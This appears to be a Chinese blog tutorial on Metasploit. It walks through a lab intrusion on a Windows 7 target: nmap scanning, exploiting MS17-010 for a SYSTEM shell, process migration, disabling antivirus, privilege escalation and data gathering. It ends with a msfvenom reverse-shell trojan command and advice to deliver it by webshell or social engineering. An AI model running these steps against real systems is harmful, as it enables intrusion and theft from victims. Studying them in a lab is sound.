Metasploit基础
- Metasploit介绍
- 模块介绍
- 渗透攻击步骤
- 实战演练
- 实验环境
- 主机发现
- 端口扫描
- 检测漏洞是否存在
- 后渗透攻击:信息收集
- 必须知道的命令
- 进程迁移
- 系统命令
- 文件系统命令
- 网络命令
- 后渗透攻击:权限提升
- 后渗透攻击:信息窃取
- 制作木马并监听
Metasploit介绍
渗透测试人员神器,骇客hack站的武器,涵盖渗透测试流程所用的模块
模块介绍
- Auxiliary(辅助模块)
该模块不会直接在测试者和目标主机之间建立访问,他们只负责扫描、嗅探、指纹识别等相关功能以辅助渗透测试。 - Exploit(漏洞利用模块)
利用系统、应用或服务中的安全漏洞进行攻击的模块。该模块存在各种POC(验证漏洞是否存在)、用于破坏系统安全性的攻击代码、每个漏洞对应的攻击代码(EXP) - Payload(攻击载荷模块)
目标系统在被渗透攻击之后完成实际攻击功能的代码,用于在目标系统上运行任意命令或者执行特定代码,添加用户账号,上传或下载文件等操作 - Post(后期渗透模块)
取得目标系统远程控制器后,进行一系列的后渗透攻击动作,如获取敏感信息、实施跳板攻击等 - Encoders(编码工具模块)
负责木马免杀,以防止安全软件检测出来
渗透攻击步骤
- 扫描目标机系统,寻找可用漏洞
- 选择并配置一个漏洞利用模块(Exploit)
- 选择并配置一个攻击载荷模块(Payload)
- 选择一个编码技术,绕过杀软
- 渗透攻击
实战演练
实验环境
windows7 靶机 ip 192.168.159.132
kali2021攻击机 ip 192.168.159.157
接下来windows7等着被渗透就ok
kali果断打开msf(建议以root身份打开)
新版kali就是漂亮,我的博客里有新版kali教程可以去看看
主机发现
从现在开始,如果目标有足够的安全防护能力,那么你的一举一动可能会被对方掌握得清清楚楚,如果渗透测试需要隐秘进行,每个步骤要足够小心才是,这篇文章不讲解隐秘方法
一开始先发现有什么主机在线
- 方法一
nmap -sn只进行主机发现,不进行端口扫描
发现了4个主机在线,其中一个虚拟网卡1,一个虚拟网卡8,一台kali,一台win7
- 方法二
msf的scanner/discovery
端口扫描
方法一
nmap -O 扫描出操作系统信息和开启的端口( -Pn 参数不使用ping方式,可以避免被防火墙发现),这里扫出多个操作系统信息,不急,往下看
nmap -sV 选项可以对目标开启的服务及版本进行探测,结合-O选项基本可以锁定目标操作系统的类型和版本,因为有的服务版本只在特定的操作系统上运行
辅助模块smb扫描得知操作系统版本
方法二
msf的scanner/portscan
这里使用syn扫描,这种方式速度快且不容易被发现
扫出了几个,但是速度还是没有nmap快
检测漏洞是否存在
很多网络服务是漏洞频发的高危对象,刚刚已经知道目标开启的服务,通过对服务信息进入更深入的挖掘,通常称为服务查点
- nmap扫描
- 这里网络换了一下,只要用–script vuln 扫就行
扫出一个ms17010漏洞
- 手动检测
看到主机开启了445端口,而这个端口也是SMB协议默认运行的端口,大多数攻击都是通过SMB服务做跳板进行MSRPC(ms远程过程调用)来对其他windows本地服务漏洞实施渗透攻击的
先查看smb版本
可以看到SMB版本和操作系统的版本
接下来搜索smb的攻击模块,并使用其中之一进行渗透攻击。模块详细信息可以use之后,show info查看
这里使用最常用的一个ms17-010
他这里已经帮我们设置好默认payload–meterpreter了,kali版本低可能要自己set payload
设置好参数,运行,成功拿shell
查看当前权限,system最高权限
后渗透攻击:信息收集
必须知道的命令
- 查看当前用户
直接是system最高权限用户,不用再利用其他漏洞提权了
在Windows操作系统中
1.普通权限 默认情况下,系统为用户分了7个组管理员组(Administrators)、高权限用户组(Power Users)、普通用户组(Users)、备份操作组(Backup Operators)、文件复制组(Replicator)、来宾用户组(Guests),已认证用户组(Ahthenticated users) 其中备份操作组和文件复制组为维护系统而设置,平时不会被使用系统默认的分组是依照一定的管理凭据指派权限的,而不是胡乱产生,管理员组拥有大部分的计算机操作权限(并不是全部),能够随意修改删除所有文件和修改系统设置只有程序信任组(特殊权限)。普通用户组则被系统拴在了自己的地盘里,不能处理其他用户的文件和运行涉及管理的程序等。来宾用户组的文件操作权限和普通用户组一样,但是无法执行更多的程序。
2.特殊权限 除了上面提到的7个默认权限分组,系统还存在一些特殊权限成员,这些成员是为了特殊用途而设置 分别是:SYSTEM(系统)、Trustedinstaller(受信任程序)、Everyone(任何人)、CREATOR OWNER(创建者) 等 这些特殊成员不被任何内置用户组吸纳,属于完全独立出来的账户。真正拥有“完全访问权”的只有一个成员:SYSTEM。.
- session放在后台
- 查看会话
- 选择会话
- 获得系统的控制台shell
进程迁移
在刚获得shell的时候,该shell是非常脆弱的,一步小心就会被用户关闭,所以第一步要移动这个shell
- 查看meterpreter进程号
- 输入ps 查看全部进程,找到后门PID
- 把进程迁移到explorer.exe(2396),因为它是个稳定的进程
迁移成功
原来的PID会自动关闭,如果没有 kill PID
系统命令
查看系统信息
查看正在运行的进程
execute命令
执行可执行文件,可以执行自己生成的木马
交互型shell
解决乱码
chcp 65001
退出shell
查看是否为虚拟机
关闭杀毒软件
启动远程桌面
查看打了什么补丁
现在已经拿到一个shell,想进一步提权,要查看有哪些漏洞可以提权
use post/windows/gather/enum_patches
还有很多请读者自行了解
文件系统命令
查看当前目录
查看当前目录内容
dir切换目录
查找文件
-f搜索指定文件名 -d指定在哪个目录下搜索
编辑文件
可以调用vi编辑器
下载文件
上传文件
不知道我的权限是怎么降下来的,上传文件到C盘失败
网络命令
查看路由表
查看网卡信息
ipconfig
后渗透攻击:权限提升
- meterpreter的getsystem
具体原理看下面连接
https://docs.rapid7.com/metasploit/meterpreter-getsystem
- 利用wmic漏洞提权
wmic是一款命令行管理工具,详情去百度
它的漏洞编号ms16-032
设置参数session,首先查看普通权限的sessionid,这里是2
- 这里测试结果有点出乎意料,等我想通再来wp哈
后渗透攻击:信息窃取
msf gather(信息搜集)路径下有很多强大的信息收集模块
- 获得目标主机最近进行的系统操作、访问文件和文档操作记录
dumplinks
- 获知目标主机安装的软件,安全更新与漏洞补丁信息
制作木马并监听
生成木马,可以通过webshell上传到目的主机中,也可以通过社工让受害人点开
msfvenom -p windows/meterpreter/reverse_tcp lhost=... lport=... -f exe -o 储存的位置
监听木马,等待着受害人打开木马
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
Metasploit基础相关推荐
- Metasploit基础和基本命令详解
Metasploit基础 2003年H.D Moore创建了Metasploit,从那之后Metasploit便快速发展起来,如今被公认为最为流行的渗透测试工具之一.Metasploit是一个完全的R ...
- metasploit基础命令介绍
web安全学习了解:web渗透测试 官网:metasploit基础命令介绍 六个模块: 一.渗透攻击模块(exploit):利用发现的安全漏洞或配置弱点对远程目标系统进行攻击的代码 (1)主动渗透 ...
- 1、metasploit基础知识(笔记)
文章目录 什么是exp? 什么是payload? 总结理解 MSF(metasploit framework)使用 进入MSF 设置监听 生成木马文件 木马上线 相关参数说明 扩展 什么是exp? 渗 ...
- Metasploit 基础
一.模块 1.Auxiliary(辅助模块) 不会直接在测试者和目标主机之间建立访问,只负责执行扫描.嗅探.指纹识别等相关功能以辅助渗透测试 2.Exploit(漏洞利用模块) 漏洞利用是指由渗透测试 ...
- metasploit基础命令操作
参考:https://longwaer.blog.csdn.net/article/details/122745903 – Exploit,攻击工具/代码 – Payload,攻击载荷 – Shell ...
- [系统安全] 四十四.APT系列(9)Metasploit技术之基础用法万字详解及防御机理
您可能之前看到过我写的类似文章,为什么还要重复撰写呢?只是想更好地帮助初学者了解病毒逆向分析和系统安全,更加成体系且不破坏之前的系列.因此,我重新开设了这个专栏,准备系统整理和深入学习系统安全.逆向分 ...
- [网络安全提高篇] 一〇二.Metasploit技术之基础用法万字详解及防御机理
当您阅读到该篇文章时,作者已经将"网络安全自学篇"设置成了收费专栏,首先说声抱歉.感谢这一年来大家的阅读和陪伴,这100篇安全文章记录了自己从菜鸡到菜鸟的成长史,该部分知识也花了很 ...
- Metasploit技术(一)——Metasploit简介与基础
目录 一.Metasploit简介 二.Metasploit基础 2.1 专业术语 2.2 渗透攻击步骤 一.Metasploit简介 Metasploit是当前信息安全与渗透测试领域最流行的术语 ...
- 第四期_Metasploit 基础(六)Meterprete《Metasploit Unleashed Simplified Chinese version(Metasploit官方文档教程中文版)》
翻译者说明1:本文为Metasploit Unleashed中文版翻译.原文链接:https://www.offensive-security.com/metasploit-unleashed/ 翻译 ...
最新文章
- 我开发共享软件的三次经历(中):我赚到了十万块
- #数据集#:并发脑电图、心电图和多剂量经颅电刺激行为的数据集
- JSP+JavaBean+Servlet工作原理实例…
- php和html和javascript,php和javascript区别有哪些
- java 8 lambda sort_Java8 用Lambda表达式给List集合排序的实现|chu
- CentOS 7从Python 2.7升级至Python3.6.1
- 统计分组的原则是要体现什么_什么样的卖场原则更能体现商业设计的价值!
- 电子设计竞赛电源题(2)-检波与采样
- 实验2 SQL Server 表操作
- 数据库实例:用户登录
- 小型机oracle命令,IBM 小型机基本知识及AIX操作系统基本命令.doc
- 学会智能标注与海量复杂文本分类
- SQL Server-【知识与实战II】条件查询、比较运算符查询、模糊查询、枚举查询、范围查询、空值查询、多重条件查询
- APP 代码提交GitHub: 提交、合并与冲突解决 (终端操作语法)
- synchronized工作原理剖析(二)
- Code-NFine:jqgrid 数据绑定
- CGAL预定义内核转换的问题
- 张江男曲折的出国梦_IT新闻_博客园
- 泰山OFFICE技术讲座:英寸,厘米,磅,派卡,提,行,字行,像素的换算关系
- android分辨率2k3k4k,android 不同分辨率适配